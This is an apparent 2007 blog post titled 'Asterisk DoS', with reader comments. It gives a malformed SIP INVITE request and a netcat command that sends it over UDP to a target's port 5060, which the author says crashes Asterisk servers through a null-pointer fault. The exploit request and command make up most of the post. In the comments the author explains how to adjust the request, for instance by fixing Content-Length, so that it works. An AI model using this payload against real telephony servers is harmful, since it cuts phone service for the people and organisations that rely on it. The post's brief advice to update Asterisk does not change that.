$cat sipreq.txt
INVITE\r\n
Via: SIP/2.0/UDP asterisk.server.pt;branch=z9hG5bG796asdhds Max-Forwards: 70
To: My enemy <sip:enemy@victim.com>
From: Myself <sip:myself@server.pt>;tag=1928305734
Call-ID: c84b4a76e68790@asterisk.server.pt
CSeq: 314159 INVITE
Contact: <sip:myself@server.pt>
Content-Type: application/sdp
Content-Length: 147
$nc -u victim.com 5060 < sipreq.txt
Goodbye Phone calls. I know that the protocol says:
"A Request-Line contains a method name, a Request-URI, and the protocol version separated by a single space (SP) character.",
but asterisk's coders should be aware to treat this null pointers when a bad formed request is made.
Update your asterisk software.
"Always forgive your enemies, nothing annoys them more"
View Comments
Asterisk DoS
Tue Mar 13 18:01 2007
Braceta
Wed Mar 14 23:06 2007
Doesn't work.. :)
Thu Mar 15 10:01 2007
Which asterisk version do you have?
Btw, if you just copy paste my SIP request it's natural that doesn´t work, you have to do some lite changes to became valid. For example the Content-Length number isn´t correct with the package payload's length.
Btw, if you just copy paste my SIP request it's natural that doesn´t work, you have to do some lite changes to became valid. For example the Content-Length number isn´t correct with the package payload's length.
